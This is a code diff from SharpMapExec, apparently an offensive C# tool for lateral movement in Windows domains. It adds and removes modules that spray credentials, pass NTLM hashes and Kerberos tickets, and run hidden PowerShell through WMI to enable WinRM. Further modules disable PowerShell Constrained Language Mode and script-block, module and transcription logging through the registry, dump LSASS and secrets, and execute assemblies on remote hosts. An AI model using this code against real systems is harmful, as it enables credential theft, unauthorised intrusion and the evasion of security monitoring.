6	+	using System.Threading;
7	+	using System.Threading.Tasks;
8	+	using Microsoft.Management.Infrastructure;
9	+	using Microsoft.Management.Infrastructure.Options;
10	+	using SharpMapExec.Helpers;
11	+
12	+	namespace SharpMapExec.Lib
13	+	{
14	+	class Cim
15	+	{
16	+	public static string Namespace = @"root\cimv2";
17	+
18	+	public static CimSession newSession(string computername, string domain, string username, string password, bool impersonate = false)
19	+	{
20	+	CimSession cimSession;
21	+
22	+	if (impersonate)
23	+	{
24	+	DComSessionOptions options = new DComSessionOptions { Impersonation = ImpersonationType.Default };
25	+	cimSession = CimSession.Create(computername, options);
26	+	}
27	+	else
28	+	{
29	+	CimCredential credentials = new CimCredential(PasswordAuthenticationMechanism.Negotiate, domain, username, Misc.CreateSecuredString(password));
30	+	WSManSessionOptions sessionOptions = new WSManSessionOptions();
31	+	sessionOptions.AddDestinationCredentials(credentials);
32	+	sessionOptions.MaxEnvelopeSize = 256000;
33	+	cimSession = CimSession.Create(computername, sessionOptions);
34	+	}
35	+	return cimSession;
36	+	}
37	+
38	+	public static bool CheckLocalAdmin(CimSession cimSession)
39	+	{
40	+	if (!cimSession.TestConnection(out CimInstance instance, out CimException exception))
41	+	{
42	+	Console.WriteLine(String.Format(" [-] Failed to authenticate on {0}", cimSession.ComputerName));
43	+	return false;
44	+	}
45	+	Console.WriteLine(String.Format(" [+] Local Admin on {0}", cimSession.ComputerName));
46	+	return true;
47	+	}
48	+
49	+	public static void enable_winrm(CimSession cimSession)
50	+	{
51	+	CimMethodParametersCollection cimParams = new CimMethodParametersCollection
52	+	{
53	+	CimMethodParameter.Create("CommandLine", "powershell -nop -w hidden -command 'Enable-PSRemoting -Force'", CimFlags.In)
54	+	};
55	+	CimMethodResult results = cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", cimParams);
56	+	if (results.ReturnValue.Value.ToString() == "0")
57	+	{
58	+	Console.WriteLine(" [+] WinRm Enabled");
59	+	}
60	+	else
61	+	{
62	+	Console.WriteLine(" [-] Failed To Enable WinRm");
63	+	}
64	+	}
65	+
66	+	public static void disable_winrm(CimSession cimSession)
67	+	{
68	+	CimMethodParametersCollection cimParams = new CimMethodParametersCollection
69	+	{
70	+	CimMethodParameter.Create("CommandLine", "powershell -nop -w hidden -command 'Disable-PSRemoting -Force'", CimFlags.In)
71	+	};
72	+	CimMethodResult results = cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", cimParams);
73	+	if (results.ReturnValue.Value.ToString() == "0")
74	+	{
75	+	Console.WriteLine(" [+] WinRm Disabled");
76	+	}
77	+	else
78	+	{
79	+	Console.WriteLine(" [-] Failed To Disable WinRm");
80	+	}
81	+	}
82	+
83	+	//registry
84	+	//https://wutils.com/wmi/root/cimv2/stdregprov/
85	+	public static bool regExists(CimSession cimSession, UInt32 hDefKey, string sSubKeyName, string keyName)
86	+	{
87	+	CimMethodParametersCollection cimParams = new CimMethodParametersCollection
88	+	{
89	+	CimMethodParameter.Create("hDefKey", hDefKey, CimFlags.In),
90	+	CimMethodParameter.Create("sSubKeyName", sSubKeyName, CimFlags.In)
91	+	};
92	+	CimMethodResult results = cimSession.InvokeMethod(new CimInstance("StdRegProv", Namespace), "EnumValues", cimParams);
93	+	if (results.ReturnValue.Value.ToString() != "0")
94	+	return false;
95	+
96	+	string value = ((string[])results.OutParameters["sNames"].Value).FirstOrDefault(i => i.Contains(keyName));
97	+	if (string.IsNullOrEmpty(value))
98	+	{
99	+	return false;
100	+	}
101	+	return true;
102	+	}
103	+
104	+	public static CimMethodResult readRegValue(CimSession cimSession, UInt32 hDefKey, string sSubKeyName, string keyName, string method)
105	+	{
106	+	CimMethodParametersCollection cimParams = new CimMethodParametersCollection
107	+	{
108	+	CimMethodParameter.Create("hDefKey", hDefKey, CimFlags.In),
109	+	CimMethodParameter.Create("sSubKeyName", sSubKeyName, CimFlags.In),
110	+	CimMethodParameter.Create("sValueName", keyName, CimFlags.In)
111	+	};
112	+	CimMethodResult results = cimSession.InvokeMethod(new CimInstance("StdRegProv", Namespace), method, cimParams);
113	+	return results;
114	+	}
115	+
116	+	public static string setRegValue(CimSession cimSession, UInt32 hDefKey, string sSubKeyName, string keyName, string keyValue)
117	+	{
118	+	CimMethodParametersCollection cimParams = new CimMethodParametersCollection
119	+	{
120	+	CimMethodParameter.Create("hDefKey", hDefKey, CimFlags.In),
121	+	CimMethodParameter.Create("sSubKeyName", sSubKeyName, CimFlags.In),
122	+	CimMethodParameter.Create("sValueName", keyName, CimFlags.In),
123	+	CimMethodParameter.Create("sValue", keyValue, CimFlags.In)
124	+	};
125	+	CimMethodResult result = cimSession.InvokeMethod(new CimInstance("StdRegProv", Namespace), "SetStringValue", cimParams);
126	+	return result.ReturnValue.Value.ToString();
127	+	}
128	+
129	+	public static string setRegValue(CimSession cimSession, UInt32 hDefKey, string sSubKeyName, string keyName, UInt32 keyValue)
130	+	{
131	+	CimMethodParametersCollection cimParams = new CimMethodParametersCollection
132	+	{
133	+	CimMethodParameter.Create("hDefKey", hDefKey, CimFlags.In),
134	+	CimMethodParameter.Create("sSubKeyName", sSubKeyName, CimFlags.In),
135	+	CimMethodParameter.Create("sValueName", keyName, CimFlags.In),
136	+	CimMethodParameter.Create("uValue", keyValue, CimFlags.In)
137	+	};
138	+	CimMethodResult result = cimSession.InvokeMethod(new CimInstance("StdRegProv", Namespace), "SetDWORDValue", cimParams);
139	+	return result.ReturnValue.Value.ToString();
140	+	}
141	+
142	+	public static void disable_pslockdown(CimSession cimSession)
143	+	{
144	+	bool lockdown = regExists(cimSession, 0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\Environment", "__PSLockdownPolicy");
145	+	if (!lockdown)
146	+	{
147	+	Console.WriteLine("[*] CLM not enabled");
148	+	return;
149	+	}
150	+
151	+	string value = (string)readRegValue(cimSession, 0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\Environment", "__PSLockdownPolicy", "GetStringValue").OutParameters["sValue"].Value;
152	+	Console.WriteLine(" [*] __PSLockdownPolicy value: {0}", value);
153	+
154	+	if (value.ToString() == "8")
155	+	{
156	+	return;
157	+	}
158	+
159	+	string result = setRegValue(cimSession, 0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\Environment", "__PSLockdownPolicy", "8");
160	+	if (result.Contains("0"))
161	+	{
162	+	Console.WriteLine(" [+] Constrained Language Mode Disabled");
163	+	}
164	+	else
165	+	{
166	+	Console.WriteLine(" [-] Failed To Disable Constrained Language Mode");
167	+	}
168	+	}
169	+
170	+	public static void check_pslockdown(CimSession cimSession)
171	+	{
172	+	bool lockdown = regExists(cimSession, 0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\Environment", "__PSLockdownPolicy");
173	+	if (!lockdown)
174	+	{
175	+	Console.WriteLine("[*] CLM not enabled");
176	+	return;
177	+	}
178	+
179	+	string value = (string)readRegValue(cimSession, 0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\Environment", "__PSLockdownPolicy", "GetStringValue").OutParameters["sValue"].Value;
180	+	Console.WriteLine(" [*] __PSLockdownPolicy value: {0}", value);
181	+	}
182	+
183	+	public static void disable_pslogging(CimSession cimSession)
184	+	{
185	+	Dictionary<string, string> keys = new Dictionary<string, string>
186	+	{
187	+	{ "EnableModuleLogging", @"Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging" },
188	+	{ "EnableTranscripting", @"Software\Policies\Microsoft\Windows\PowerShell\Transcription" },
189	+	{ "EnableScriptBlockLogging", @"Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" },
190	+	{ "EnableScriptBlockInvocationLogging", @"Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" },
191	+	};
192	+	foreach (var key in keys)
193	+	{
194	+	bool lockdown = regExists(cimSession, 0x80000002, key.Value, key.Key);
195	+	if (!lockdown)
196	+	{
197	+	Console.WriteLine("[*] {0} not enabled", key.Key);
198	+	continue;
199	+	}
200	+
201	+	var value = readRegValue(cimSession, 0x80000002, key.Value, key.Key, "GetDWORDValue").OutParameters["uValue"].Value;
202	+	Console.WriteLine(" [*] {0} value: {1}", key.Key, value);
203	+
204	+	if(value.ToString() == "0")
205	+	{
206	+	continue;
207	+	}
208	+
209	+	string result = setRegValue(cimSession, 0x80000002, key.Value, key.Key, 0);
210	+	if (result.Contains("0"))
211	+	{
212	+	Console.WriteLine(" [+] {0} Disabled", key.Key);
213	+	}
214	+	else
215	+	{
216	+	Console.WriteLine(" [-] Failed To Disable {0}", key.Key);
217	+	}
218	+	}
219	+	}
220	+
221	+	public static void check_pslogging(CimSession cimSession)
222	+	{
223	+	Dictionary<string, string> keys = new Dictionary<string, string>
224	+	{
225	+	{ "EnableModuleLogging", @"Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging" },
226	+	{ "EnableTranscripting", @"Software\Policies\Microsoft\Windows\PowerShell\Transcription" },
227	+	{ "EnableScriptBlockLogging", @"Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" },
228	+	{ "EnableScriptBlockInvocationLogging", @"Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" },
229	+	};
230	+	foreach (var key in keys)
231	+	{
232	+	if (!regExists(cimSession, 0x80000002, key.Value, key.Key))
233	+	{
234	+	Console.WriteLine("[*] {0} not enabled", key.Key);
235	+	continue;
236	+	}
237	+	var value = readRegValue(cimSession, 0x80000002, key.Value, key.Key, "GetDWORDValue").OutParameters["uValue"].Value;
238	+	Console.WriteLine(" [*] {0} value: {1}", key.Key, value);
239	+	}
240	+	}
241	+	}
242	+	}
243	+

■ ■ ■ ■ ■ ■

SharpMapExec/Lib/Kerberos.cs

1	+	using Rubeus;
2	+	using SharpMapExec.Helpers;
3	+	using System;
4	+	using System.Collections.Generic;
5	+	using System.Threading.Tasks;
6	+	using static Rubeus.Interop;
7	+
8	+	namespace SharpMapExec.Lib
9	+	{
10	+	public class kerberos
11	+	{
12	+	public static void Kerberos(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, string path, string destination, List<string> flags, string protocol)
13	+	{
14	+	StartJob(users, domain, passwords, hashes, ticket, encType, dc, computernames, module, moduleargument, path, destination, flags, protocol);
15	+	//var listOfTasks = new List<Task>();
16	+	//listOfTasks.Add(new Task(() => StartJob(users, domain, passwords, hashes, ticket, encType, dc, computernames, module, moduleargument, path, destination, flags, protocol)));
17	+	//Tasks.StartAndWaitAllThrottled(listOfTasks, 1);
18	+	}
19	+
20	+	public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, string path, string destination, List<string> flags, string protocol)
21	+	{
22	+	AToken.MakeToken("Fake", "Fake", "Fake");
23	+	Console.WriteLine("------------------");
24	+	string ticketoutput;
25	+
26	+	if (String.IsNullOrEmpty(ticket))
27	+	{
28	+	foreach (string user in users)
29	+	{
30	+	var secrets = hashes.Length > 0 ? hashes : passwords;
31	+	foreach (string secret in secrets)
32	+	{
33	+	string hash;
34	+	if (passwords.Length > 0)
35	+	{
36	+	string salt = String.Format("{0}{1}", domain.ToUpper(), user);
37	+	hash = Crypto.KerberosPasswordHash(encType, secret, salt);
38	+	}
39	+	else
40	+	{
41	+	hash = secret;
42	+	}
43	+	Console.WriteLine(string.Format("[*] User: {0}", user));
44	+	Console.WriteLine(string.Format("[*] Domain: {0}", domain));
45	+	Console.WriteLine(string.Format("[*] Secret: {0}", secret));
46	+	ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc);
47	+	if (ticketoutput.Contains("[+] Ticket successfully imported!"))
48	+	Console.WriteLine("[+] Ticket successfully imported!");
49	+	else
50	+	{
51	+	Console.WriteLine("[-] Could not request TGT");
52	+	continue;
53	+	}
54	+	if (protocol.ToLower() == "smb")
55	+	Scan.SMB(computernames, module);
56	+	else if (protocol.ToLower() == "winrm")
57	+	Scan.WINRM(computernames, module, moduleargument, path, destination, flags);
58	+	else if (protocol.ToLower() == "reg32")
59	+	Scan.REG32(computernames, module);
60	+	}
61	+	}
62	+	}
63	+	else
64	+	{
65	+	Console.WriteLine(string.Format("[*] Ticket: {0}", ticket));
66	+	ticketoutput = SecurityContext.ImportTicket(ticket);
67	+	if (ticketoutput.Contains("[+] Ticket successfully imported!"))
68	+	Console.WriteLine("[+] TGT imported successfully!");
69	+	else
70	+	{
71	+	Console.WriteLine("[-] Could not import TGT");
72	+	return;
73	+	}
74	+	if (protocol.ToLower() == "smb")
75	+	Scan.SMB(computernames, module);
76	+	else if (protocol.ToLower() == "winrm")
77	+	Scan.WINRM(computernames, module, moduleargument, path, destination, flags);
78	+	else if (protocol.ToLower() == "reg32")
79	+	Scan.REG32(computernames, module);
80	+	}
81	+
82	+	AToken.RevertFromToken();
83	+	}
84	+	}
85	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Lib/KerberosSmb.cs

1	-	using Rubeus;
2	-	using SharpMapExec.Helpers;
3	-	using System;
4	-	using System.Collections.Generic;
5	-	using System.IO;
6	-	using static Rubeus.Interop;
7	-
8	-	namespace SharpMapExec.Lib
9	-	{
10	-	public class kerberossmb
11	-	{
12	-	public static void KerberosSmb(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, List<string> flags)
13	-	{
14	-	StartJob(users, domain, passwords, hashes, ticket, encType, dc, computernames, module, moduleargument, flags);
15	-	//var listOfTasks = new List<Task>();
16	-	//listOfTasks.Add(new Task(() => StartJob(user, domain, hash, encType, outfile, ptt, dc, luid, describe, computernames, module, moduleargument)));
17	-	//Tasks.StartAndWaitAllThrottled(listOfTasks, 1);
18	-	}
19	-
20	-	public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, List<string> flags)
21	-	{
22	-	string ticketoutput;
23	-	if (String.IsNullOrEmpty(ticket))
24	-	{
25	-	foreach (string user in users)
26	-	{
27	-	var secrets = hashes.Length > 0 ? hashes : passwords;
28	-	foreach (string secret in secrets)
29	-	{
30	-	string hash;
31	-	if (passwords.Length > 0)
32	-	{
33	-	string salt = String.Format("{0}{1}", domain.ToUpper(), user);
34	-	hash = Crypto.KerberosPasswordHash(encType, secret, salt);
35	-	}
36	-	else
37	-	{
38	-	hash = secret;
39	-	}
40	-	AToken.MakeToken("Fake", "Fake", "Fake");
41	-	Console.WriteLine("------------------");
42	-	Console.WriteLine(string.Format("[*] User: {0}", user));
43	-	Console.WriteLine(string.Format("[*] domain: {0}", domain));
44	-	Console.WriteLine(string.Format("[*] secret: {0}", secret));
45	-	ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc);
46	-	if (ticketoutput.Contains("[+] Ticket successfully imported!"))
47	-	Console.WriteLine("[+] Ticket successfully imported!");
48	-	else
49	-	{
50	-	Console.WriteLine("[-] Could not request TGT");
51	-	continue;
52	-	}
53	-	Console.WriteLine();
54	-	foreach (string computername in computernames)
55	-	{
56	-	Console.WriteLine(String.Format("[*] Checking {0}", computername));
57	-	if (!Misc.CheckHostPort(computername, 445))
58	-	{
59	-	Console.WriteLine(String.Format("[-] Could Not Reach {0}:445", computername));
60	-	Console.WriteLine();
61	-	continue;
62	-	}
63	-	if (!Directory.Exists(Path.Combine("loot", computername)))
64	-	{
65	-	Directory.CreateDirectory(Path.Combine("loot", computername));
66	-	}
67	-	Smb.CheckLocalAdmin(computername, module);
68	-	Console.WriteLine("");
69	-	}
70	-	AToken.RevertFromToken();
71	-	}
72	-	}
73	-	}
74	-	else
75	-	{
76	-	AToken.MakeToken("Fake", "Fake", "Fake");
77	-	Console.WriteLine("------------------");
78	-	Console.WriteLine(string.Format("[*] Ticket: {0}", ticket));
79	-	ticketoutput = SecurityContext.ImportTicket(ticket);
80	-	if (ticketoutput.Contains("[+] Ticket successfully imported!"))
81	-	Console.WriteLine("[+] TGT imported successfully!");
82	-	else
83	-	{
84	-	Console.WriteLine("[-] Could not import TGT");
85	-	return;
86	-	}
87	-	Console.WriteLine();
88	-	foreach (string computername in computernames)
89	-	{
90	-	Console.WriteLine(String.Format("[*] Checking {0}", computername));
91	-	if (!Misc.CheckHostPort(computername, 445))
92	-	{
93	-	Console.WriteLine(String.Format("[-] Could Not Reach {0}:445", computername));
94	-	Console.WriteLine();
95	-	continue;
96	-	}
97	-	if (!Directory.Exists(Path.Combine("loot", computername)))
98	-	{
99	-	Directory.CreateDirectory(Path.Combine("loot", computername));
100	-	}
101	-	Smb.CheckLocalAdmin(computername, module);
102	-	Console.WriteLine("");
103	-	}
104	-	AToken.RevertFromToken();
105	-	}
106	-	}
107	-	}
108	-	}

■ ■ ■ ■ ■ ■

SharpMapExec/Lib/KerberosWinrm.cs

1	-	using Rubeus;
2	-	using SharpMapExec.Helpers;
3	-	using System;
4	-	using System.Collections.Generic;
5	-	using System.IO;
6	-	using static Rubeus.Interop;
7	-
8	-	namespace SharpMapExec.Lib
9	-	{
10	-	public class kerberoswinrm
11	-	{
12	-	public static void KerberosWinRm(string[] users, string domain, string[] passwords, string[] hash, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, string path, string destination, List<string> flags)
13	-	{
14	-	if (module.Contains("exec") && moduleargument.Length == 0)
15	-	{
16	-	Console.WriteLine("[-] Missing exec argument");
17	-	return;
18	-	}
19	-	if (module.Contains("assembly") && !File.Exists(path))
20	-	{
21	-	Console.WriteLine("[-] Missing assembly path");
22	-	return;
23	-	}
24	-	if (module.Contains("download") && (String.IsNullOrEmpty(path) \|\| String.IsNullOrEmpty(destination)))
25	-	{
26	-	Console.WriteLine("[-] Need path and destination");
27	-	return;
28	-	}
29	-	if (module.Contains("upload") && (String.IsNullOrEmpty(path) \|\| String.IsNullOrEmpty(destination)))
30	-	{
31	-	Console.WriteLine("[-] Need path and destination");
32	-	return;
33	-	}
34	-	StartJob(users, domain, passwords, hash, ticket, encType, dc, computernames, module, moduleargument, path, destination, flags);
35	-	//var listOfTasks = new List<Task>();
36	-	//listOfTasks.Add(new Task(() => StartJob(users, domain, passwords, hash, ticket, encType, dc, computernames, module, moduleargument, flags)));
37	-	//Tasks.StartAndWaitAllThrottled(listOfTasks, 1);
38	-	}
39	-
40	-	public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, string path, string destination, List<string> flags)
41	-	{
42	-	AToken.MakeToken("Fake", "Fake", "Fake");
43	-	string ticketoutput;
44	-	if (String.IsNullOrEmpty(ticket))
45	-	{
46	-	foreach (string user in users)
47	-	{
48	-	var secrets = hashes.Length > 0 ? hashes : passwords;
49	-	foreach (string secret in secrets)
50	-	{
51	-	string hash;
52	-	if (passwords.Length > 0)
53	-	{
54	-	string salt = String.Format("{0}{1}", domain.ToUpper(), user);
55	-	hash = Crypto.KerberosPasswordHash(encType, secret, salt);
56	-	}
57	-	else
58	-	{
59	-	hash = secret;
60	-	}
61	-
62	-	Console.WriteLine("------------------");
63	-	Console.WriteLine(string.Format("[*] User: {0}", user));
64	-	Console.WriteLine(string.Format("[*] domain: {0}", domain));
65	-	Console.WriteLine(string.Format("[*] secret: {0}", secret));
66	-	ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc);
67	-	if (ticketoutput.Contains("[+] Ticket successfully imported!"))
68	-	Console.WriteLine("[+] Ticket successfully imported!");
69	-	else
70	-	{
71	-	Console.WriteLine("[-] Could not request TGT");
72	-	continue;
73	-	}
74	-	//ticket debugging
75	-	//List<LSA.SESSION_CRED> sessionCreds = LSA.EnumerateTickets(false, new LUID(), "", "", "", true);
76	-	//LSA.DisplaySessionCreds(sessionCreds, LSA.TicketDisplayFormat.Klist);
77	-	Console.WriteLine();
78	-	foreach (string computername in computernames)
79	-	{
80	-	Console.WriteLine(String.Format("[*] Checking {0}", computername));
81	-	if (!Misc.CheckHostPort(computername, 5985))
82	-	{
83	-	Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername));
84	-	Console.WriteLine();
85	-	continue;
86	-	}
87	-	if (!Directory.Exists(Path.Combine("loot", computername)))
88	-	{
89	-	Directory.CreateDirectory(Path.Combine("loot", computername));
90	-	}
91	-	if (module.Length == 0 \|\| module.Contains("exec"))
92	-	{
93	-	Wsman.CheckLocalAdmin(computername, moduleargument, flags);
94	-	}
95	-	else if (module.Contains("comsvcs"))
96	-	{
97	-	Wsman.InvokeComSvcsLsassDump(computername);
98	-	}
99	-	else if (module.Contains("secrets") \|\| module.Contains("secret"))
100	-	{
101	-	Wsman.GetSecrets(computername);
102	-	}
103	-	else if (module.Contains("assembly"))
104	-	{
105	-	Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
106	-	}
107	-	else if (module.Contains("download"))
108	-	{
109	-	Wsman.CopyFile(computername, path, destination);
110	-	}
111	-	else if (module.Contains("upload"))
112	-	{
113	-	Wsman.UploadFile(computername, path, destination);
114	-	}
115	-	Console.WriteLine("");
116	-	}
117	-	}
118	-	}
119	-	}
120	-	else
121	-	{
122	-	Console.WriteLine("------------------");
123	-	Console.WriteLine(string.Format("[*] Ticket: {0}", ticket));
124	-	ticketoutput = SecurityContext.ImportTicket(ticket);
125	-	if (ticketoutput.Contains("[+] Ticket successfully imported!"))
126	-	Console.WriteLine("[+] TGT imported successfully!");
127	-	else
128	-	{
129	-	Console.WriteLine("[-] Could not import TGT");
130	-	return;
131	-	}
132	-	//ticket debugging
133	-	//List<LSA.SESSION_CRED> sessionCreds = LSA.EnumerateTickets(false, new LUID(), "", "", "", true);
134	-	//LSA.DisplaySessionCreds(sessionCreds, LSA.TicketDisplayFormat.Klist);
135	-	Console.WriteLine();
136	-	foreach (string computername in computernames)
137	-	{
138	-	Console.WriteLine(String.Format("[*] Checking {0}", computername));
139	-	if (!Misc.CheckHostPort(computername, 5985))
140	-	{
141	-	Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername, flags));
142	-	Console.WriteLine();
143	-	continue;
144	-	}
145	-	if (!Directory.Exists(Path.Combine("loot", computername)))
146	-	{
147	-	Directory.CreateDirectory(Path.Combine("loot", computername));
148	-	}
149	-	if (module.Length == 0 \|\| module.Contains("exec"))
150	-	{
151	-	Wsman.CheckLocalAdmin(computername, moduleargument, flags);
152	-	}
153	-	else if (module.Contains("comsvcs"))
154	-	{
155	-	Wsman.InvokeComSvcsLsassDump(computername);
156	-	}
157	-	else if (module.Contains("secrets") \|\| module.Contains("secret"))
158	-	{
159	-	Wsman.GetSecrets(computername);
160	-	}
161	-	else if (module.Contains("assembly"))
162	-	{
163	-	Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
164	-	}
165	-	else if (module.Contains("download"))
166	-	{
167	-	Wsman.CopyFile(computername, path, destination);
168	-	}
169	-	else if (module.Contains("upload"))
170	-	{
171	-	Wsman.UploadFile(computername, path, destination);
172	-	}
173	-	Console.WriteLine("");
174	-	}
175	-	}
176	-	AToken.RevertFromToken();
177	-	}
178	-	}
179	-	}

■ ■ ■ ■ ■ ■

SharpMapExec/Lib/Ntlm.cs

1	+	using Microsoft.Management.Infrastructure;
2	+	using SharpMapExec.Helpers;
3	+	using System;
4	+	using System.Collections.Generic;
5	+	using System.Linq;
6	+	using System.Threading.Tasks;
7	+	using static SharpMapExec.Helpers.SecurityContext;
8	+
9	+	namespace SharpMapExec.Lib
10	+	{
11	+	public class ntlm
12	+	{
13	+	public static void Ntlm<T>(string[] users, string domain, T secrets, string[] computernames, string module, string moduleargument,string path, string destination, List<string> flags, string protocol)
14	+	{
15	+	StartJob(users, domain, secrets, computernames, module, moduleargument, path, destination, flags, protocol);
16	+	//var listOfTasks = new List<Task>();
17	+	//listOfTasks.Add(new Task(() => StartJob(users, domain, secrets, computernames, module, moduleargument, path, destination, flags, protocol)));
18	+	//Tasks.StartAndWaitAllThrottled(listOfTasks, 1);
19	+	}
20	+
21	+	public static void StartJob<T>(string[] users, string domain, T secrets, string[] computernames, string module, string moduleargument, string path, string destination, List<string> flags, string protocol)
22	+	{
23	+	string[] passwords;
24	+	if (typeof(T) == typeof(NTHash))
25	+	{
26	+	passwords = (string[])secrets.GetType().GetProperties().Single(pi => pi.Name == "Nthash").GetValue(secrets, null);
27	+	foreach (string user in users)
28	+	{
29	+	foreach (string password in passwords)
30	+	{
31	+	Console.WriteLine("------------------");
32	+	Console.WriteLine(string.Format("[*] User: {0}", user));
33	+	Console.WriteLine(string.Format("[*] domain: {0}", domain));
34	+	Console.WriteLine(string.Format("[*] secret: {0}", password));
35	+	Console.WriteLine();
36	+	SetThreadToken(user, domain, password);
37	+	if (protocol.ToLower() == "smb")
38	+	{
39	+	Scan.SMB(computernames, module);
40	+	}
41	+	else if (protocol.ToLower() == "winrm")
42	+	{
43	+	Scan.WINRM(computernames, module, moduleargument, path, destination, flags);
44	+	}
45	+	else if (protocol.ToLower() == "reg32")
46	+	{
47	+	Scan.REG32(computernames, module);
48	+	}
49	+	}
50	+	}
51	+	}
52	+	else if (typeof(T) == typeof(ClearText))
53	+	{
54	+	passwords = (string[])secrets.GetType().GetProperties().Single(pi => pi.Name == "Cleartext").GetValue(secrets, null);
55	+	foreach (string user in users)
56	+	{
57	+	foreach (string password in passwords)
58	+	{
59	+	Console.WriteLine("------------------");
60	+	Console.WriteLine(string.Format("[*] User: {0}", user));
61	+	Console.WriteLine(string.Format("[*] domain: {0}", domain));
62	+	Console.WriteLine(string.Format("[*] secret: {0}", password));
63	+	Console.WriteLine();
64	+	using (new Impersonator.Impersonation(domain, user, password))
65	+	{
66	+	if (protocol.ToLower() == "smb")
67	+	{
68	+	Scan.SMB(computernames, module);
69	+	}
70	+	else if (protocol.ToLower() == "winrm")
71	+	{
72	+	Scan.WINRM(computernames, module, moduleargument, path, destination, flags);
73	+	}
74	+	else if (protocol.ToLower() == "cim")
75	+	{
76	+	foreach (string computername in computernames)
77	+	{
78	+	CimSession cimSession;
79	+	cimSession = Cim.newSession(computername, domain, user, password, flags.Contains("impersonate"));
80	+	Scan.CIM(cimSession, module);
81	+	}
82	+	}
83	+	else if (protocol.ToLower() == "reg32")
84	+	{
85	+	Scan.REG32(computernames, module);
86	+	}
87	+	}
88	+	}
89	+	}
90	+	}
91	+	}
92	+	}
93	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Lib/NtlmSmb.cs

1	-	using SharpMapExec.Helpers;
2	-	using System;
3	-	using System.Collections.Generic;
4	-	using System.IO;
5	-	using System.Linq;
6	-	using System.Threading.Tasks;
7	-	using static SharpMapExec.Helpers.SecurityContext;
8	-
9	-	namespace SharpMapExec.Lib
10	-	{
11	-	public class ntlmsmb
12	-	{
13	-	public static void NtlmSmb<T>(string[] users, string domain, T secrets, string[] computernames, string module, string moduleargument)
14	-	{
15	-	//StartJob(users, domain, secrets, computernames, module, moduleargument);
16	-	var listOfTasks = new List<Task>();
17	-	listOfTasks.Add(new Task(() => StartJob(users, domain, secrets, computernames, module, moduleargument)));
18	-	Tasks.StartAndWaitAllThrottled(listOfTasks, 1);
19	-	}
20	-
21	-	public static void StartJob<T>(string[] users, string domain, T secrets, string[] computernames, string module, string moduleargument)
22	-	{
23	-	string[] passwords;
24	-	if (typeof(T) == typeof(NTHash))
25	-	{
26	-	passwords = (string[])secrets.GetType().GetProperties().Single(pi => pi.Name == "Nthash").GetValue(secrets, null);
27	-	foreach (string user in users)
28	-	{
29	-	foreach (string password in passwords)
30	-	{
31	-	Console.WriteLine("------------------");
32	-	Console.WriteLine(string.Format("[*] User: {0}", user));
33	-	Console.WriteLine(string.Format("[*] domain: {0}", domain));
34	-	Console.WriteLine(string.Format("[*] secret: {0}", password));
35	-	Console.WriteLine();
36	-	SetThreadToken(user, domain, password);
37	-	foreach (string computername in computernames)
38	-	{
39	-	Console.WriteLine(String.Format("[*] Checking {0}", computername));
40	-	if (!Misc.CheckHostPort(computername, 445))
41	-	{
42	-	Console.WriteLine(String.Format("[-] Could Not Reach {0}:445", computername));
43	-	Console.WriteLine();
44	-	continue;
45	-	}
46	-	if (!Directory.Exists(Path.Combine("loot", computername)))
47	-	{
48	-	Directory.CreateDirectory(Path.Combine("loot", computername));
49	-	}
50	-	Smb.CheckLocalAdmin(computername, module);
51	-	Console.WriteLine("");
52	-	}
53	-	}
54	-	}
55	-	}
56	-	else if (typeof(T) == typeof(ClearText))
57	-	{
58	-	passwords = (string[])secrets.GetType().GetProperties().Single(pi => pi.Name == "Cleartext").GetValue(secrets, null);
59	-	foreach (string user in users)
60	-	{
61	-	foreach (string password in passwords)
62	-	{
63	-	Console.WriteLine("------------------");
64	-	Console.WriteLine(string.Format("[*] User: {0}", user));
65	-	Console.WriteLine(string.Format("[*] domain: {0}", domain));
66	-	Console.WriteLine(string.Format("[*] secret: {0}", password));
67	-	Console.WriteLine();
68	-	using (new Impersonator.Impersonation(domain, user, password))
69	-	{
70	-	foreach (string computername in computernames)
71	-	{
72	-	Console.WriteLine(String.Format("[*] Checking {0}", computername));
73	-	if (!Misc.CheckHostPort(computername, 445))
74	-	{
75	-	Console.WriteLine(String.Format("[-] Could Not Reach {0}:445", computername));
76	-	Console.WriteLine();
77	-	continue;
78	-	}
79	-	if (!Directory.Exists(Path.Combine("loot", computername)))
80	-	{
81	-	Directory.CreateDirectory(Path.Combine("loot", computername));
82	-	}
83	-	Smb.CheckSMBVersion(computername);
84	-	Smb.CheckOsVersion(computername);
85	-	Smb.CheckLocalAdmin(computername, module);
86	-	Console.WriteLine("");
87	-	}
88	-	}
89	-	}
90	-	}
91	-	}
92	-	}
93	-	}
94	-	}

■ ■ ■ ■ ■ ■

SharpMapExec/Lib/NtlmWinrm.cs

1	-	using SharpMapExec.Helpers;
